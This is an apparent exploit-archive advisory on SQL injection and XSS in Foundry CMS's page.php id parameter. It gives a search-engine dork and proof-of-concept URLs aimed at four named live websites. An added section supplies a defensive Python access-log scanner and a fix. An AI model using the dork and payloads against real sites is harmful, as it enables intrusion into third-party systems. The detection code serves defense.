Foundry CMS Multiple Vulnerability

2014-07-19T00:00:00
ID 1337DAY-ID-22450
Type zdt
Reporter Hekt0r
Modified 2014-07-19T00:00:00

Description

[+] Title: Foundry CMS Multiple Vulnerability
[+] Date: 2014/07/20
[+] Author: Hekt0r
[+] Vendor Homepage: www.design-foundry.co.uk
[+] Tested on: Windows 7 & Kali Linux
[+] Vulnerable Files: /page.php
[+] Dork: intext:"Site by The Design Foundry"
### POC:
[+] SQL Injection: http://site/page.php?id=[SQL-Injection]
[+] XSS: http://site/page.php?id=[XSS]
### Demo:
[+] SQL injection: http://www.resonatehub.co.uk/page.php?id=1'
                   http://www.sutcliffe.co.uk/page.php?id=1'
                   http://www.warmerenergyservices.com/page.php?id=25'
                   http://www.my-maintenance.com/page.php?id=1'
[+] XSS: http://www.resonatehub.co.uk/page.php?id=<script>alert(/xss/)</script>
         http://www.sutcliffe.co.uk/page.php?id=<script>alert(/xss/)</script>
         http://www.warmerenergyservices.com/page.php?id=<script>alert(/xss/)</script>
         http://www.my-maintenance.com/page.php?id=<script>alert(/xss/)</script>
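
Added example (not part of the original advisory): a log check a site operator can run to find requests to /page.php whose id value is not a plain number, which is how both issues above show up in access logs. It assumes combined-format log lines and that legitimate ids are numeric, as in the id=1 and id=25 URLs above; the function names and sample lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Request field of a combined-format access log line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (.+?) HTTP/[\d.]+"')

def classify_id(value):
    """Return None for a plain numeric id, otherwise a short reason tag."""
    for _ in range(3):  # undo nested percent-encoding (%253C -> %3C -> <)
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    if re.fullmatch(r"[0-9]{1,10}", value):
        return None
    if re.search(r"[<>]", value):
        return "markup"
    if re.search(r"['\";]|--", value):
        return "sql-metachar"
    return "non-numeric"

def scan(lines, path="/page.php", param="id"):
    """Return (line_no, client, reason) for each suspicious request."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        try:
            url = urlsplit(m.group(1))
        except ValueError:  # malformed target, not parseable as a URL
            continue
        if url.path != path:
            continue
        for raw in parse_qs(url.query, keep_blank_values=True).get(param, []):
            reason = classify_id(raw)
            if reason:
                findings.append((n, line.split()[0], reason))
    return findings

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [19/Jul/2014:10:00:01 +0000] "GET /page.php?id=25 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [19/Jul/2014:10:00:05 +0000] "GET /page.php?id=1%27 HTTP/1.1" 500 312',
    '198.51.100.7 - - [19/Jul/2014:10:00:09 +0000] "GET /page.php?id=%3Cscript%3Ealert(/xss/)%3C/script%3E HTTP/1.1" 200 5170',
    '203.0.113.4 - - [19/Jul/2014:10:01:00 +0000] "GET /index.php HTTP/1.1" 200 900',
    '203.0.113.4 - - [19/Jul/2014:10:01:02 +0000] "GET /page.php?id=%253Cb%253E HTTP/1.1" 200 5100',
]
```

The same numeric-only rule that flags these requests is the server-side fix for both issues: reject or integer-cast id before it reaches the query or the page output.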
### Credits:
[+] Special Thanks: Root SmasheR, Mr.Moein, UmPire, Ali Ahmady Saeed.Jok3r, M4hdi,
                    ALIREZA_PROMIS And All members of Iran Security Group
[+] iransec.net
